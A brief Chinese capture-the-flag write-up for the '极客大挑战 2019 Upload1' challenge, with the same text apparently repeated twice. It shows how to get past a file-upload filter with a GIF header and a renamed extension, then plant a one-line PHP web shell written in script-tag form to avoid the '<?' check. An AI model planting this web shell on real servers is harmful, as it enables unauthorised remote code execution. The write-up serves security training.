[极客大挑战 2019]Upload1
直接上传php一句话木马,提示要上传image
把文件名改成gif并加上gif文件头后,绕过了对image类型的检测,但是提示文件内含有<?,且bp抓包后改回php也会被检测
那我们考虑使用js执行php代码
<script language='php'>eval($_POST['cmd']);</script>
这样就可以绕过<?
猜测上传目录为./upload,猜测正确
在根目录下找到了flag
直接上传php一句话木马,提示要上传image
把文件名改成gif并加上gif文件头后,绕过了对image类型的检测,但是提示文件内含有<?,且bp抓包后改回php也会被检测
那我们考虑使用js执行php代码
<script language='php'>eval($_POST['cmd']);</script>
这样就可以绕过<?
猜测上传目录为./upload,猜测正确
在根目录下找到了flag